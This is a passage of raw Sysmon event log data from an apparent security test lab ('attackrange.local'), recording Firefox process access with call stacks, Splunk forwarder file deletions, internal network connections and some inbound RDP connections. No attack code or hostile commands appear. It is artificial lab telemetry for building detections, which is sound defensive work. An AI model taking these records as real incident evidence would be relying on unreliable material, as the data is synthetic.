5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001046838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.611{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001046837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.611{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001046836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.611{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001046835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.611{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf647d23.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.195{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=399314D991F05FB1B827A27F74A0BE4F,SHA256=BD71B561C0DA08668DD008C6A5ACBD93D6ACB5EEF98250FB73A99FC6072D13C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:01.211{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F3C3439290184966746149279626855,SHA256=94CC9765F559EC3599EC1600A6119F342CC56765A6771259E0199F6EA5F24DE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806593Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:01.616{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B866BC360A4ED0A1D8D038B494C07FA,SHA256=D5BF916643D7ACE66EC508201C0090799B09099548C4C93B23DCE94B591E460B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806592Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:59.264{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57195-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806594Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:02.632{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5275CBDCB611B8BBE4356C0B35E1B055,SHA256=07EA26C972E2721C0E13F9434E67A2287B1E14636E9B428512D37A947B43C1F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:02.241{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7DEBFE8626C60A06EBDB25B4F350AEC,SHA256=6E62DEA3E04B1ADCAB14D22F47320AC9F2EDE93025BF0D9677F856128956DEEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806595Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:03.647{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FE2143FC83BE1BEAEC85759A2FB5CCB,SHA256=5AD29995B45FFEF525902404925DEEF3AF493A9000A9D87C8E82C5AC84FA63B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.388{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A7E11DD2BF8857D10640D35EDE05F080,SHA256=A41BA48859F4C797F5925318F7B655AB0BEEE47BB432F7CD9E3960DBB7440F5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1BBCA2FB9FE5CC731E722985237F7981,SHA256=3ABCD4F8D8033D065DD7330F43D51A40ABF5D653970A2D47A1E6FA9B0264475F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0BB6F4B23D2FF601684632A87408A9B7,SHA256=96D78E4B5F87E1F7908F32E1673FEAEE9E9AFA8FA54A09F55454730C8EEB5CCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C283BFE7BF8DD93472D2A2221EC7E9E1,SHA256=85F87BA59304BB304A730AA7127495A516337A55DBAA4C3AD6AF60E6B3B674DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=129BD090D60E4D60307A70D940205DA4,SHA256=D31FD3F3E5D0B93FE2EF97B3F5FF91126D993D2E48E3C8C7EB74364073411AC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BB47C7B8624CC7FF0B9EF6676666F74F,SHA256=2885401BBEC53D8ABDD5AB7D6C271E63518C0216A77C4D7645FE6A474453CDB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6F7EEB420E7A3274E4BAD443920FF1C5,SHA256=5D3FA61AB26A95FA35B85CC4B71EE28E9C9DF79EFF677AB1DDD30C677F1D37B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9C951DF6799D3E39D1AA976B1420E688,SHA256=118916E5C5FF4F1D18148062D44B0E786498C799E3AE66F8C4B708F7DD94135B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4528D20BCCF97C48894B441DB9F424B6,SHA256=0E3608E267747D0E19ABD5BC7B00AA8E05B331007DFF6719FC890330ECF3DB22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C944602E191F82C508A5B7A4C3FAC2EA,SHA256=FB123CBC0E0EA8CB7B77AF5E0EC328EB7A4EA6452D5C31CBB6F4BD9F438ED795,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1ABD9D1C4BBE908F33D3F78C190FA517,SHA256=504C1E1959470832D0F73C2C2D2FFF155B9CCB0D238A5A91E8CA289B47734E12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.271{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC6CFA6203F375BBAAACC497F684C72E,SHA256=C6EF05EDBE9178CCFBFD2E644759A22DACAF95C275FD3B32B6D36BFDF05CF852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806599Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:04.694{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74E192B1CE3BF6CF02D3AF07B9C1E24E,SHA256=236960611596B32E5CC96310BE963ABB3A3DC2E125B79327B3D7240DDD4EA0F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:56.768{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57196-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001046858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:04.291{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=793AC9214010798D082123BA4C4AE0EA,SHA256=D9BC6D717B56D783C7F93793E6D9636D8C1475B9F4BF60294117C7EE02F5C2B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806598Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:02.817{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om57862-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806597Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:04.226{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B836257E21137688BD27A984F660CDB6,SHA256=DE2774570DEDF8BB1678F5D94095D5B8C6F7F40EBB5B08F45299C140C51DEA1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806596Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:04.226{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D6CB7CC0F8FF4A10F2F14DEA4FB8D59,SHA256=68CD63AF5007E851768DEF794E1A9B428C79C0C29A1D1C6A424D41D2783E997F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806601Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:05.741{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24180F04894F221F0EFA6A8651782C75,SHA256=67EE532C085248BE969BF8A25AE7EF427B9E7B9CE48424B43493C5E97F603CEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:05.307{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2731F66762E4AC433EF4190F37E7C165,SHA256=9AB4F335A1F029E91EBF6F7AB8905CF0BD4BCC0DB9A2A3B17189186BC678A536,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806600Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:03.367{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57196-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000806603Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:06.757{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73E54FD185293546B837E8FAF2B34D34,SHA256=FFA4204C0914EAA3A7A54E1D3C1C1C7B43A12E7F5657D2014228E533A6C6A613,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:58.659{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50949-false10.0.1.12-8000- 23542300x80000000000000001046866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:06.321{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A82C1FF32060A3619A789E723DDCFA,SHA256=9587822555933406A32679E9B9C2381AB317B87D2F46274D403B8720F689EF4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806602Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:05.249{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57197-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001046865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:06.190{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:06.137{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001046863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:06.137{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001046862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:47:06.137{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.4048.408.46251248C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001046861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:47:06.137{466BC892-5563-60E8-2010-00000000CF01}4048\chrome.4048.408.46251248C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000806606Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:07.788{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9802459BBF6ACD780E83469FD6DA4DD,SHA256=687A7B5DDDB849ED2EF37282DBC748CF09F3272EDF2E5428C77169A86CEF4AF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:07.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=166A7083D12B1B310918918227E925F1,SHA256=A691F4FDB3335E886C5ACF945ADF3ACCDEF853DF092F2CD504F67CFC7FE95417,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806605Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:06.377{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-2202-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806604Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:07.538{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B836257E21137688BD27A984F660CDB6,SHA256=DE2774570DEDF8BB1678F5D94095D5B8C6F7F40EBB5B08F45299C140C51DEA1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:07.236{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BDDC3F6BD66C30EE5927573F5C70117,SHA256=E68CA0B79A32927F5B7CD576BC7205E1D015333B649430FE06B129AE0E026FDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:07.236{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 